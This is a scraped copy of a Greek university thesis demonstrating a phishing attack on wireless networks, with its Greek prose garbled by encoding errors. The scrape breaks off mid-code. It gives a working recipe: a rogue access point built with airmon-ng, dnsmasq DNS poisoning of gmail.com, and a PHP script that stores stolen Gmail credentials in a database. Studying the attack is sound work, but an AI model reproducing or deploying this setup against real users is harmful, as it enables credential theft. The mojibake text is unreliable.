SlideShare uma empresa Scribd logo

Phising without a thread

M
Markos Khattari
1 de 28
Baixar para ler offline
0 ΠΑΝΔΠΙ΢ΣΗΜΙΟ ΠΔΙΡΑΙΧ΢ Σκήκα Φεθηαθώλ ΢πζηεκάησλ Phishing Without a Thread Δπίζεζε ηύπνπ phishing ζε αζύξκαην δίθηπν. Φνηηεηήο: Μάξθνο Υαηηάξη – Δ/04188 Δπηβιέπσλ Καζεγεηήο: Κσλζηαληίλνο Λακπξηλνπδάθεο
1 Πεξίιεςε ΢ηελ πηπρηαθή απηή εξγαζία ζα πξαγκαηνπνηεζεί κηα πξαθηηθή επίζεζε ηύπνπ phishing κε ζθνπό λα ππνθιαπνύλ νη θσδηθνί πξόζβαζεο ηνπ gmail account ελόο ρξήζηε. Υξεζηκνπνηνύκε έλαλ ππνινγηζηή ν νπνίνο ιεηηνπξγεί ζε πεξηβάιινλ Linux (Ubuntu, release 10.04) ν νπνίνο έρεη δηακνξθσζεί θαηάιιεια ώζηε λα ιεηηνπξγεί σο wireless router. Όηαλ ν ρξήζηεο ζπλδεζεί ζε απηό ην wireless router, δξνκνινγνύκε κε ρξήζε DNS Poisoning θάζε ηνπ πξνζπάζεηα λα κπεη ζην gmail, ζε κηα ηνπηθή ηζηνζειίδα παξόκνηα κε ην gmail, γηα λα ππνθιέςνπκε ηνπο θσδηθνύο πξόζβαζεο. Σα ζηνηρεία ηνπ ρξήζηε απνζεθεύνληαη ζε κηα βάζε δεδνκέλσλ. Σα πιενλεθηήκαηα ηεο κεζόδνπ απηήο ζε ζρέζε κε ζηνρεπκέλεο επηζέζεηο, νη νπνίεο απαηηνύλ από ηνλ ππνθινπέα λα παξαθνινπζεί ηελ θίλεζε ζην δίθηπν θαη λα ζηνρεύεη ηελ IP πνπ ηνλ ελδηαθέξεη, είλαη όηη ηόζν ε δξνκνιόγεζε όζν θαη ε απνζήθεπζε ησλ θσδηθώλ πξόζβαζεο είλαη πιήξσο απηνκαηνπνηεκέλε.
2 Πεξίιεςε….…………………………………………………………………………...1 Πεξηερόκελα…………………………………………………………………………...2 1. Δηζαγσγή…..……………………………………………………..…………………3 2. Ιζηνξηθή Αλαδξνκή…………………………………………………………………4 2.1 Απαξρέο…………………………………………………..……………......4 2.2 Πξόζθαηεο επηζέζεηο phishing…...……………………………………......4 2.3 Παξάδεηγκα Phising Mail………………………………………………….5 3. Σερληθέο Phising…………………………………………………………………….7 3.1 Παξαπνίεζε ΢πλδέζκσλ.………………………………………………….7 3.2 Απνθπγή Φίιηξσλ…………………………………………………………8 3.3 Παξαπνίεζε Ιζηνζειίδσλ…………………………………………………8 3.4 Phone Phising…..………………………………………………………….9 4. Πξνβιήκαηα πνπ δεκηνπξγεί ην Phising…………………………………………10 5. Τινπνίεζε….…………………………………………………………………….11 5.1 Πξνεηνηκαζία Τπνινγηζηή………………………………………………11 5.1.1 Γεκηνπξγία πιαζηήο ηζηνζειίδαο Gmail...……………………11 5.1.2 Ρπζκίζεηο Routing θαη Forwarding…………………………….13 5.2 Γεκηνπξγία πιαζηνύ Access Point………………………………………15 5.3 ΢ελάξηα Υξήζεο…………………………………………………………18 6. Σξόπνη Πξνζηαζίαο……………………………………………………………….18 7. Παξάξηεκα ……………………………………………………………………….19 Βηβιηνγξαθία…………………………………………………………………………27
3 1. Δηζαγσγή ΢ηνλ ηνκέα ηεο ειεθηξνληθήο αζθάιεηαο είλαη δηαδεδνκέλν ην πξόβιεκα ππνθινπήο νλνκάησλ ρξεζηώλ, θσδηθώλ πξόζβαζεο (usernames, passwords), ζηνηρείσλ πηζησηηθώλ θαξηώλ θαη άιισλ επαίζζεησλ πιεξνθνξηώλ. Όηαλ απηή γίλεηαη κέζσ πξνζπνίεζεο κηαο αμηόπηζηεο νληόηεηαο ζε θάπνηα ειεθηξνληθή επηθνηλσλία, νλνκάδεηαη phising. Η νληόηεηα πνπ ζπλήζσο ππνδύεηαη ν επηηηζέκελνο είλαη είηε θάπνηα γλσζηή ηζηνζειίδα παξνρήο ππεξεζηώλ (email, θνηλσληθή δηθηύσζε) είηε ε ηζηνζειίδα θάπνηαο ηξάπεδαο ή άιιεο ππεξεζίαο δηαρείξηζεο ειεθηξνληθώλ ρξεκαηηθώλ ζπλαιιαγώλ. Σν phishing δηεμάγεηαη ζπλήζσο κέζσ e-mail ή instant messaging, θαη ηα κελύκαηα πξνηξέπνπλ ηνπο ρξήζηεο λα εηζάγνπλ πιεξνθνξίεο ζε κηα ςεύηηθε ηζηνζειίδα, ε νπνία σζηόζν δείρλεη όκνηα κε ηελ απζεληηθή. Πξόθεηηαη γηα έλα παξάδεηγκα ρξήζεο ηερληθώλ social engineering πνπ εθκεηαιιεύεηαη ηε κε επαξθή ρξήζε ηερλνινγηώλ αζθαιείαο ζην δηαδίθηπν.
4 2. Ιζηνξηθή Αλαδξνκή 2.1 Απαξρέο Η πξώηε θαηαγεγξακκέλε ρξήζε ηνπ όξνπ "phishing" έγηλε ην 1996 αλ θαη ππήξμε κηα ιεπηνκεξήο πεξηγξαθή ηεο ηερληθήο από ην 1987, ζην δηεζλέο Users Group ηεο εηαηξείαο Hewlett Packard. Οη πξώηεο επηζέζεηο κε ζεκαληηθό αληίθηππν έγηλαλ ζην δίθηπν ηεο AOL (America Online), κέζσ κελπκάησλ ζηνλ ηόηε δεκνθηιή AIM (AOL Instant Messenger), ηα νπνία πξνέηξεπαλ ηνπο ρξήζηεο λα επηθπξώζνπλ ηα ζηνηρεία ηνπο, δεηώληαο κεηαμύ άιισλ θαη ηνλ θσδηθό πξόζβαζεο ηνπο. Η ίδηα ηαθηηθή ρξεζηκνπνηείηαη απξόζθνπηα κέρξη ζήκεξα ζε emails πνπ ππνηίζεηαη όηη πξνέξρνληαη από ηξάπεδεο. Δπηθαινύληαη ππνηηζέκελν πξόβιεκα κε ηνλ ινγαξηαζκό ηνπ πειάηε – ζηόρνπ, δεηώληαο αξηζκνύο πηζησηηθώλ θαξηώλ, θαζώο θαη ηα PIN θαη ηνπο αξηζκνύο αζθαιείαο CVV2/CVC2 πνπ ηνπο αληηζηνηρνύλ γηα λα επηβεβαηώζνπλ ηα ζηνηρεία πνπ έρνπλ. Σα emails απηά ρξεζηκνπνηνύλ ινγόηππα ηεο ηξάπεδαο αιιά θαη links πνπ νδεγνύλ ζην πξαγκαηηθό site, κε ζθνπό ηελ πεξαηηέξσ παξαπιάλεζε ηνπ ρξήζηε, ελώ ην πην πεηζηηθό κέζν είλαη ε ρξήζε δηεπζύλζεσλ ειεθηξνληθνύ ηαρπδξνκείνπ πνπ δείρλνπλ απζεληηθά θαζώο πεξηέρνπλ ζπλήζσο ην όλνκα ηεο ππεξεζίαο πνπ ππνηίζεηαη όηη ηα ζηέιλεη . Οη ηξάπεδεο πξνζπαζνύλ λα αληηκεησπίζνπλ ην πξόβιεκα κε ελεκεξσηηθά κελύκαηα ζηηο ειεθηξνληθέο ηνπο ζειίδεο, όπνπ επηζεκαίλνπλ όηη πνηέ δε δεηείηαη PIN ή άιινο πξνζσπηθόο θσδηθόο από ππάιιειν ηεο ηξάπεδαο, κε νπνηνδήπνηε ηξόπν.
5 2.2 Πξόζθαηα θαηαγεγξακκέλεο επηζέζεηο phishing Κύξηνο ζηόρνο ησλ επηζέζεσλ, παξακέλνπλ νη πειάηεο ηξαπεδώλ θαη άιισλ ππεξεζηώλ ειεθηξνληθώλ πιεξσκώλ όπσο ην PayPal. Χζηόζν ε ηαρεία εμάπισζε ησλ ηζηνζειίδσλ θνηλσληθήο δηθηύσζεο πξνζθέξνπλ λένπο, πνιιά ππνζρόκελνπο ζηόρνπο γηα επηζέζεηο phishing, θαζώο ηα πξνζσπηθά δεδνκέλα κπνξνύλ λα ρξεζηκνπνηεζνύλ γηα ππεμαηξέζεηο ηαπηόηεηαο εηο βάξνο αλππνςίαζησλ ρξεζηώλ. Η έιιεηςε εμνηθείσζεο ησλ λέσλ ρξεζηώλ κε ην δηαδίθηπν ηνπο θαζηζηά επθνιόηεξνπο ζηόρνπο ζε ηέηνηνπ είδνπο επηζέζεηο. Πεηξάκαηα έρνπλ δείμεη όηη νη επηζέζεηο phising έρνπλ έλα πνζνζηό επηηπρίαο ηεο ηάμεσο ηνπ 70%. Γεδνκέλνπ όηη πνιύ ζπρλά, αθόκε θαη έκπεηξνη ρξήζηεο ρξεζηκνπνηνύλ ηνλ ίδην θσδηθό αλαγλώξηζεο γηα πεξηζζόηεξεο από κηα ππεξεζίεο, καο δίλεη κηα ζεκαληηθή έλδεημε γηα ην κέγεζνο ηεο δεκηάο πνπ κπνξεί λα πξνθιεζεί ζηελ ειεθηξνληθή παξνπζία ελόο αηόκνπ από κηα θαη κόλν επηηπρεκέλε επίζεζε phising. Σν 2006, έλα worm θαηέιαβε ηζηνζειίδεο ρξεζηώλ ηνπ MySpace θαη άιιαμε δηάθνξα links ώζηε λα ζηέιλνπλ ηνπο επηζθέπηεο ζε ηζηνζειίδεο ζρεδηαζκέλεο γηα λα ππνθιέπηνπλ ζηνηρεία login. Τπάξρνπλ ηζηνζειίδεο όπσο ε FraudWatch International θαη ε Millersmiles, πνπ έρνπλ σο ζθνπό ηελ θαηαπνιέκεζε ηνπ phishing. Οη ηζηνζειίδεο δεκνζηεύνπλ ηα πην πξόζθαηα πιαζηά κελύκαηα κε ηα νπνία νη phisers πξνζπαζνύλ λα παγηδεύζνπλ ηνπο ρξήζηεο θαη πξνζθέξνπλ εκπνξηθή αληηκεηώπηζε ζηνρεπκέλνπ phising πνπ γίλεηαη εηο βάξνο εηαηξεηώλ. 2.3 Παξάδεηγκα Phising Mail Αθνινπζεί έλα phising mail ην νπνίν έρεη ζρεδηαζηεί γηα ππεμαίξεζε ζηνηρείσλ ζύλδεζεο ζην PayPal. Σν mail από ην νπνίν εζηάιε είλαη ην service@security-paypal.com
6 Φπζηθά ηα emails πνπ πξνέξρνληαη από ην PayPal έρνπλ σο host ην paypal.com. Χζηόζν έλαο κε έκπεηξνο ρξήζηεο ζα κπνξνύζε λα ππνζέζεη όηη πξόθεηηαη γηα ην ηκήκα “αζθάιεηαο” ηνπ PayPal, λα κπεη ζηελ ηζηνζειίδα κέζσ ηνπ link πνπ βξίζθεηαη ζην mail θαη λα νδεγεζεί ζηελ πξνθαλώο πιαζηή ηζηνζειίδα: http://tcr.logo-shop.net/paypal.com/
7 3. Σερληθέο Phising Σν πξνεγνύκελν παξάδεηγκα καο έδεημε έλαλ κόλν από ηνπο ηξόπνπο πνπ ρξεζηκνπνηνύληαη γηα ππνθινπή θσδηθώλ πξόζβαζεο. Αλ θαη έρεη ραξαθηεξηζηεί “κεζαίαο επηθηλδπλόηεηαο” από ην Millersmiles, απηό έρεη λα θάλεη κε ηε δηεύζπλζε απνζηνιήο. To site ζην νπνίν νδεγεί είλαη πξνθαλέζηαηα πιαζηό αιιά αλ ε δηεύζπλζε απηή έθαλε redirect ζε κηα ζειίδα κε url www.security-paypal.com, ε επηθηλδπλόηεηα απηνύ ηνπ scam mail ζα απμαλόηαλ θαηαθόξπθα. 3.1 Παξαπνίεζε ΢πλδέζκσλ Οη πεξηζζόηεξεο κέζνδνη ζηηο επηζέζεηο phishing, ρξεζηκνπνηνύλ θάπνηα ηερληθή παξαπιάλεζε όπσο ε αλσηέξσ, ζρεδηαζκέλε έηζη ώζηε λα εκθαλίδεηαη σο απζεληηθό έλα link ζε έλα email, θαζώο θαη ε ηζηνζειίδα ζηελ νπνία νδεγεί. ΢ύλδεζκνη κε αδηόξαηα ηππνγξαθηθά ιάζε είλαη πνιύ ζπλεζηζκέλνη. Οη δηεπζύλζεηο κνηάδνπλ νπηηθά κε ηηο πξαγκαηηθέο θαη εμαπαηνύλ ην ρξήζηε κε έλα πηζηό αληίγξαθν ηεο ηζηνζειίδαο πνπ πεξηκέλεη λα δεη. Έλα παξάδεηγκα γηα ππεμαίξεζε πιεξνθνξηώλ κε απηό ηνλ ηξόπν, ήηαλ ε ρξήζε ηνπ domain .corn. Έλαο ρξήζηεο πνπ βιέπεη θεπγαιέα ηε δηεύζπλζε http://www.trapeza.corn/ ζηνλ browser κπνξεί εύθνια λα λνκίζεη όηη είλαη ζηελ απζεληηθή ζειίδα http://www.trapeza.com/ θαη λα θαηαρσξήζεη ηα ζηνηρεία ηνπ.
8 Έλα άιιν πξόβιεκα κε ηα URLs παξνπζηάζηεθε κε ηε δηάζεζε domain names ζε γιώζζεο κε ραξαθηήξεο πέξαλ ησλ ιαηηληθώλ. Έηζη, έλαο ζύλδεζκνο όπσο ην “eurνbank.gr”, ζα κπνξνύζε λα νδεγεί ζε κηα πιαζηή ζειίδα, επεηδή ην “ν” ζην link είλαη ειιεληθό. Σν πξόβιεκα παξακέλεη αθόκε θαη αλ έλαο ρξήζηεο πξνζέρεη ηα ςεθηαθά πηζηνπνηεηηθά, κηαο θαη είλαη δπλαηόλ ν επηηηζέκελνο λα αγνξάζεη έλα πηζηνπνηεηηθό γηα ην site ηνπ θαη ζηε ζπλέρεηα λα κεηαβάιιεη ην πεξηερόκελό ηνπ, αληηγξάθνληαο ηε ζειίδα πνπ επηζπκεί λα ππνθιέςεη. Η ρξήζε subdomains είλαη αθόκε κηα ζπλεζηζκέλε κνξθή εμαπάηεζεο. Γηα παξάδεηγκα ε ηζηνζειίδα: http://www.trapeza.kartes.gr/, δείρλεη λα νδεγεί ζην ηκήκα θαξηώλ ηεο “Trapeza”. ΢ηελ πξαγκαηηθόηεηα ζα νδεγνύζε ζην ηκήκα "trapeza" ηνπ kartes.gr πνπ ζα κπνξνύζε λα πεξηέρεη κηα πιαζηή απεηθόληζε ηνπ απζεληηθνύ website. 3.2 Απνθπγή Φίιηξσλ Σα θίιηξα αλεπηζύκεηνπ ειεθηξνληθνύ ηαρπδξνκείνπ (spam), είλαη ξπζκηζκέλα ώζηε λα απνξξίπηνπλ phishing e-mails βάζεη ιέμεσλ-θιεηδηώλ πνπ πεξηέρνπλ. Χζηόζν νη phisers, αληηθαζηζηνύλ ην θείκελν κε εηθόλεο, παξαθάκπηνληαο ηα θίιηξα γηα phising. Γηα απηό ην ιόγν, νη παξνρείο ππεξεζηώλ ειεθηξνληθνύ ηαρπδξνκείνπ δελ θνξηώλνπλ ηηο εηθόλεο πνπ πεξηέρεη έλα email αλ ν ρξήζηεο δε δεισζεη όηη ν ρξήζηεο γλσξίδεη θαη εκπηζηεύεηαη ηνλ απνζηνιέα. ΢ε απηή ηελ πεξίπησζε όκσο, πξέπεη λα βαζηζηεί ζηε δηεύζπλζε email πνπ κπνξεί εύθνια λα παξνπζηαζηεί σο απζεληηθή. 3.3 Γεκηνπξγία Πιαζηώλ Ιζηνζειίδσλ Αλαθεξζήθακε ήδε ζε ηζηνζειίδεο πνπ έρνπλ ζρεδηαζηεί αληηγξάθνληαο ηηο ηζηνζειίδεο πνπ ππνδύνληαη. ΢ε πεξίπησζε πνπ o ππνθινπέαο δελ έρεη δεκηνπξγήζεη domain πνπ λα κνηάδεη κε απηό ηεο απζεληηθήο ζειίδαο, ρξεζηκνπνηεί εληνιέο JavaScript ώζηε λα παξαπνηήζεη ηε γξακκή δηεύζπλζεο. Απηό γίλεηαη είηε ηνπνζεηώληαο κηα εηθόλα πάλσ από ηε δηεύζπλζε, θαιύπηνληάο ηε, είηε θξύβνληαο
9 εληειώο ηε κπάξα δηεπζύλζεσλ κέζσ εληνιώλ HTML θαη αθήλνληαο κόλν ηελ εηθόλα ζηελ θνξπθή. Ο επηηηζέκελνο κπνξεί λα ρξεζηκνπνηήζεηο αθόκε θαη ειαηηώκαηα ηνπ ίδηνπ ηνπ script ηεο ζειίδαο, θάλνληαο αθόκε θαη ηα πηζηνπνηεηηθά αζθαιείαο λα εκθαλίδνληαη ζσζηά. ΢ηελ πξαγκαηηθόηεηα, ην link πνπ νδεγεί ζηε ζειίδα είλαη θηηαγκέλν έηζη ώζηε λα δηεμάγεη ηελ επίζεζε. Έλα ηέηνην ειάηησκα ρξεζηκνπνηήζεθε ην 2006 ελάληηα ζην PayPal. Η RSA Security αλαθάιπςε όηη θπθινθνξεί έλα παθέην εξγαιείσλ γηα phising, πνπ κέζα από έλα απιό interface παξέρεη ζην ρξήζηε ηε δπλαηόηεηα λα αλαπαξάγεη πεηζηηθά websites θαη λα απνθηά πιεξνθνξίεο πξόζβαζεο κέζσ κηαο man-in-the-middle ηερληθήο. ΢εκαληηθή βνήζεηα ζηνπο phisers έρεη πξνζθέξεη θαη ην flash, αθνύ θξύβνληαο ηα κελύκαηα πνπ πξνηξέπνπλ ηνλ αλππνςίαζην ρξήζηε λα δειώζεη ηα ζηνηρεία ηνπ κέζα ζε multimedia objects, απνθεύγνπλ ηηο κεραλέο αλαδήηεζεο θαθόβνπισλ ηζηνζειίδσλ πνπ ςάρλνπλ γηα θείκελα κε ζπγθεθξηκέλα ραξαθηεξηζηηθά θαη ιέμεηο θιεηδηά πνπ παξαπέκπνπλ ζε κελύκαηα εμαπάηεζεο θαη ηα νπνία ρξεζηκνπνηνύληαη από ζειίδεο γηα phising Μηα αθόκε ηερληθή πνπ ρξεζηκνπνηείηαη κε επηηπρία είλαη ε πξνώζεζε ελόο ρξήζηε ζηελ πξαγκαηηθή ηζηνζειίδα ηεο ηξάπεδάο ηνπ. Χζηόζν ην link έρεη δηακνξθσζεί έηζη ώζηε λα εκθαλίζεη θαη έλα παξάζπξν (popup window) δεηώληαο ηα ζηνηρεία ζύλδεζήο ηνπ κε ην e-banking ηεο ηξάπεδαο. Η κέζνδνο απηή είλαη ηδηαίηεξα επηθίλδπλε, θαζώο θάπνηεο ηξάπεδεο ρξεζηκνπνηνύλ θαη νη ίδηεο popup windows γηα ηε ζύλδεζε ηνπ πειάηε. 3.4 Phone Phising Οη πηζαλνί ζηόρνη γηα phishing δελ είλαη θαη' αλάγθε ηζηνζειίδεο. Έλαο επηηηζέκελνο κπνξεί λα ζηείιεη κελύκαηα πνπ ηζρπξίδνληαη όηη πξνέξρνληαη από κηα ηξάπεδα θαη λα δεηήζνπλ από ην ρξήζηε λα θαιέζεη έλα ηειεθσληθό αξηζκό γηα λα δηεπζεηεζεί ππνηίζεηαη έλα πξόβιεκα πνπ έρεη πξνθύςεη κε ηνλ ηξαπεδηθό ηνπο ινγαξηαζκό. Δθεί ηνπο ππνδέρεηαη έλα απηνκαηνπνηεκέλν κήλπκα ην νπνίν δεηά λα
10 πιεθηξνινγήζνπλ ζηε ζπζθεπή ηνλ αξηζκό ηνπ ηξαπεδηθνύ ηνπο ινγαξηαζκνύ, ηεο πηζησηηθήο ηνπο θάξηαο θαη ην PIN ηνπο. 4. Πξνβιήκαηα πνπ δεκηνπξγεί ην phising Οη επηζέζεηο ηύπνπ phishing δεκηνπξγνύλ πξνβιήκαηα πνπ πνηθίινπλ από άξλεζε πξόζβαζεο ζε ειεθηξνληθέο ππεξεζίεο κέρξη ζεκαληηθέο νηθνλνκηθέο απώιεηεο. Τπνινγίδεηαη όηη κεηαμύ ηνπ Μαΐνπ ηνπ 2004 θαη ηνπ Μαΐνπ ηνπ 2005, πεξίπνπ 1,2 εθαηνκκύξηα ρξήζηεο κόλν από ηηο Ηλσκέλεο Πνιηηείεο, έραζαλ ζπλνιηθά 929 εθαηνκκύξηα δνιάξηα. Σν 2007 νη επηζέζεηο θιηκαθώζεθαλ, εμαπαηώληαο 3,6 εθαηνκκύξηα ελήιηθεο λα ράζνπλ 3.2 δηζεθαηνκκύξηα δνιάξηα. ΢ην Ηλσκέλν Βαζίιεην, νη απώιεηεο από απάηεο ζην web banking ζρεδόλ δηπιαζηάζηεθαλ από 12,2 εθαηνκκύξηα ιίξεο ην 2004 ζε 23,2 εθαηνκκύξηα ην 2005, ελώ 1 ζηνπο 20 ρξήζηεο δειώλνπλ όηη έπεζαλ ζύκαηα phising. Μέζσ phising όκσο κπνξνύλ λα ραζνύλ θαη ινγαξηαζκνί γηα ηνπο νπνίνπο νη ρξήζηεο έρνπλ αθηεξώζεη ρξόλν αιιά ζε νξηζκέλεο πεξηπηώζεηο θαη ρξήκα. Σν θαηλόκελν παξαηεξείηαη ζε δηθηπαθά παηρλίδηα ξόισλ, όπνπ ηα εηθνληθά αληηθείκελα θαη ην εηθνληθό λόκηζκα ηνπ παηρληδηνύ αληαιιάζζεηαη ζε δεκνπξαζίεο κε πξαγκαηηθά ρξήκαηα. Η θινπή ηεο εηθνληθήο πεξηνπζίαο δε ρξεηάδεηαη παξά ειάρηζηα ιεπηά κεηά ηελ ππεμαίξεζε ησλ ζηνηρείσλ ζύλδεζεο. Γηα απηό ην ιόγν, ην Αλώηαην Γηθαζηήξην ηεο Ννηίνπ Κνξέαο, απνθάζηζε όηη ηα εηθνληθά αγαζά ζα έρνπλ ίδηα λνκηθή κεηαρείξηζε κε ηα πξαγκαηηθά αγαζά. Σα εηθνληθά αγαζά ππνινγίδνληαη σο κηα βηνκεραλία αμίαο 5 δηζεθαηνκκπξίσλ δνιαξίσλ παγθνζκίσο.
11 5. Τινπνίεζε Γηα λα ιεηηνπξγήζεη έλαο ππνινγηζηήο σο router δε ρξεηάδνληαη ηδηαίηεξεο απαηηήζεηο ζε ζέκαηα ηζρύνο, κλήκεο ή ρσξεηηθόηεηαο ζην ζθιεξό δίζθν. Χζηόζν, θξίλεηαη αλαγθαία ε ύπαξμε θαηάιιεινπ πιηθνύ όζνλ αθνξά ηελ αζύξκαηε δηθηύσζε, θαζώο δελ είλαη όιεο νη ζπζθεπέο ηθαλέο λα κπνπλ ζε monitor mode. Σν Linux Wireless wiki, πεξηέρεη κηα ελεκεξσκέλε ιίζηα, ζρεηηθά κε ηηο ζπζθεπέο πνπ κπνξνύκε λα ρξεζηκνπνηήζνπκε. 5.1 Πξνεηνηκαζία Τπνινγηζηή Υξεζηκνπνηνύκε έλα απιό netbook κε ηελ ηειεπηαία δηαλνκή Ubuntu, ηε 10.04. Ο ππνινγηζηήο είλαη ζπλδεδεκέλνο αζύξκαηα κε έλα δίθηπν. Θα ρξεζηκνπνηήζνπκε έλαλ USB αληάπηνξα αζύξκαηνπ δηθηύνπ, κνληέιν ASUS WL- 167g γηα λα δεκηνπξγήζνπκε έλα ςεύηηθν access point πνπ ζα ππνδύεηαη ην πξαγκαηηθό. Η ρξήζε netbook καο δίλεη ην πιενλέθηεκα ηεο απηνλνκίαο θαζώο έρνπκε κηα ζπζθεπή ρσξίο εμσηεξηθέο απαηηήζεηο ζε ελέξγεηα ε νπνία κπνξεί λα αλαδηαλείκεη κηα ήδε ππάξρνπζα αζύξκαηε ζύλδεζε ζην internet ή θαη κηα ζύλδεζε ζην internet κέζσ δηθηύνπ θηλεηήο ηειεθσλίαο. Δγθαζηζηνύκε ηα πξνγξάκκαηα airmon-ng, airbase-ng, dhcp3, dnsmasq θαη xampp for linux ζηνλ ππνινγηζηή, απαξαίηεηα γηα ηε δεκηνπξγία ηνπ access point, ην ζηήζηκν ηεο ςεύηηθεο ηζηνζειίδαο θαη ηελ απνζήθεπζε ησλ ζηνηρείσλ ηνπ ρξήζηε. 5.1.1 Γεκηνπξγία πιαζηήο ηζηνζειίδαο Gmail. ΢ε έλα terminal ηξέρνπκε ηελ εληνιή: sudo /opt/lampp/lampp start γηα λα μεθηλήζεη ην xampp for linux. Αλνίγνπκε έλαλ browser θαη πιεθηξνινγνύκε localhost ζηε κπάξα δηεπζύλζεσλ. Από ηελ αξρηθή ζειίδα ηνπ xampp κεηαβαίλνπκε ζην phpMyAdmin όπνπ θαη ζα δεκηνπξγήζνπκε ηε βάζε δεδνκέλσλ καο. Γεκηνπξγνύκε κηα απιή βάζε, (όλνκα βάζεο: gTake) κε έλα table (όλνκα πίλαθα creds) ην νπνίν έρεη δύν πεδία, ην
12 email θαη ην pass, ζηα νπνία ζα απνζεθεύνληαη ην email θαη ν θσδηθόο πξόζβαζεο ηνπ ρξήζηε αληίζηνηρα. Μεηαβαίλνπκε ζηελ ζειίδα εηζόδνπ ζην gmail θαη αληηγξάθνπκε ηνλ source code. Σνλ κεηαθέξνπκε ζε έλα θελό έγγξαθν ην νπνίν απνζεθεύνπκε ζαλ αξρείν php ζην θάθειν htdocs ζην path: /opt/lampp/. Δπεμεξγαδόκαζηε ην αξρείν θαη ζηε θόξκα ηνπ login, αιιάδνπκε ηε δηεύζπλζε ζηελ νπνία νδεγεί ην post action, ηελ εληνιή απνζηνιήο ησλ ζηνηρείσλ πνπ εηζήγαγε ν ρξήζηεο γηα απζεληηθνπνίεζε, ζε κηα ηνπηθή ζειίδα. Η insert.php δηακνξθώλεηαη έηζη ώζηε λα ζπλδέεηαη ζηε βάζε δεδνκέλσλ πνπ δεκηνπξγήζακε θαη λα θαηαρσξεί ην username θαη ην password ζηα αληίζηνηρα πεδία σο εμήο: <?php $con = mysql_connect("localhost","root",""); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("gTake", $con); mysql_query("INSERT INTO creds VALUES ('$_POST[Email]', '$_POST[Passwd]')"); mysql_close($con); header('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail'); ?> <form id="gaia_loginform" action="insert.php" method="post" onsubmit= "return(gaia_onLoginSubmit());" >
13 Αθνύ πεξάζεη ηα ζηνηρεία ζηε βάζε, ζηέιλεη ην ρξήζηε ζηε θαλνληθή ζειίδα ηνπ gmail γηα λα ζπλδεζεί. 5.1.2 Ρπζκίζεηο Routing θαη Forwarding ΢ηε ζπλέρεηα ξπζκίδνπκε ηνλ ππνινγηζηή ώζηε λα δίλεη δηεπζύλζεηο IP από έλα ζπγθεθξηκέλν εύξνο ζε όζεο ζπζθεπέο ζπλδεζνύλ κε απηόλ θαη λα πξνσζεί ζπγθεθξηκέλα requests ζηελ ζειίδα πνπ ζέινπκε. Γηα επθνιία ηξέρνπκε ηελ εληνιή sudo su πνπ καο δίλεη δηθαηώκαηα δηαρεηξηζηή ρσξίο λα ρξεηάδεηαη λα εηζάγνπκε ηνλ θσδηθό καο ζπλέρεηα. Να επηζεκάλνπκε όηη απαηηείηαη ηδηαίηεξε πξνζνρή θαζώο όηαλ έρνπκε root privileges ηίπνηε δε καο πεξηνξίδεη από ην λα θαηαζηξέςνπκε ην ζύζηεκα καο. Αξρηθά επεμεξγαδόκαζηε ην αξρείν dhcpd.conf ην νπνίν βξίζθεηαη ζην θάθειν ηνπ dhcp3, κε ηελ εληνιή: nano /etc/dhcp3/dhcpd.conf ΢ηε ζπλέρεηα αιιάδνπκε ην πεξηερόκελό ηνπ ζε: Απνζεθεύνπκε θαη θιείλνπκε ην αξρείν. ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 192.168.2.129; range 192.168.2.130 192.168.2.140; }
14 Η IP δηεύζπλζε 192.168.2.129 αληηζηνηρεί ζην router ηνπ δηθηύνπ πνπ ζα δεκηνπξγήζνπκε, δειαδή ζην netbook καο. Με απηέο ηηο ξπζκίζεηο, ν dhcp server αλαδεηά ηηο αληηζηνηρίζεηο ησλ domain names πξώηα ηνπηθά. Με ηε ρξήζε ηνπ dnsmasq κπνξνύκε λα πξνσζνύκε ζπγθεθξηκέλα domains ζηελ IP πνπ ζέινπκε. Ρπζκίδνπκε ινηπόλ ην dnsmasq λα πξνσζεί ηηο αηηήζεηο πξνο ην gmail.com ζην δηθό καο site. Αλνίγνπκε ην αξρείν ξπζκίζεσλ ηνπ dnsmasq ηξέρνληαο ηελ εληνιή: sudo nano /etc/dnsmasq.conf ΢ηε γξακκή 58, κεηά ην ζεκείν πνπ αλαθέξεη: Πξνζζέηνπκε ηε γξακκή: Βιέπνπκε θαη εδώ ηελ IP address ηνπ router καο. Απνζεθεύνπκε θαη θιείλνπκε ην αξρείν. Καλνληθά ε αξρηθή ζειίδα ηεο ηνπηθήο δηεύζπλζεο (localhost) καο νδεγεί ζηε ζειίδα δηαρείξηζεο ηνπ xampp. Γηα λα πξνσζείηαη ν ρξήζηεο ζηε ζειίδα πνπ δεκηνπξγήζακε, αιιάδνπκε ην αξρείν index.php πνπ βξίζθεηαη ζηε δηαδξνκή /opt/lampp/htdocs ώζηε λα έρεη απηή ηε κνξθή: address=/gmail.com/192.168.2.129 # Add domains which you want to force to an IP address here. # The example below send any host in doubleclick.net to a local # webserver. #address=/doubleclick.net/127.0.0.1
15 Δδώ είλαη ρξήζηκν λα θάλνπκε έλα restart ώζηε λα θιείζνπλ όια ηα services πνπ ηξέρνπλ θαη λα ηα εθθηλήζνπκε εθ λένπ αξγόηεξα. 5.2 Γεκηνπξγία πιαζηνύ Access Point Μεηά ηελ επαλεθθίλεζε είκαζηε έηνηκνη λα ζηήζνπκε ην access point ζην ρώξν πνπ καο ελδηαθέξεη. ΢ε έλα terminal ηξέρνληαο ηελ εληνιή iwconfig βιέπνπκε όηη ην interface ηνπ USB adapter είλαη ην wlan1 ελώ ηνπ ελζσκαησκέλνπ wifi adapter ην eth1. Θέηνπκε ην wlan1 ζε monitor mode κε ηηο εληνιέο: airmon-ng # καο δείρλεη ηηο ζπζθεπέο αζύξκαηνπ δηθηύνπ πνπ έρνπκε ζηνλ ππνινγηζηή καο, γηα λα επηιέμνπκε πνηα ζα ρξεζηκνπνηεζεί γηα monitoring airmon-ng start wlan1 # ζέηνπκε ζε monitor mode ην ASUS dongle, ην όλνκα ηνπ interface ην είρακε βξεί κε ηελ iwconfig, δεκηνπξγώληαο κηα εηθνληθή ζπζθεπή κε ην όλνκα mon0 <?php if (!empty($_SERVER['HTTPS']) && ('on' == $_SERVER['HTTPS'])) { $uri = 'https://'; } else { $uri = 'http://'; } $uri .= $_SERVER['HTTP_HOST']; # header('Location: '.$uri.'/xampp/'); header('Location: 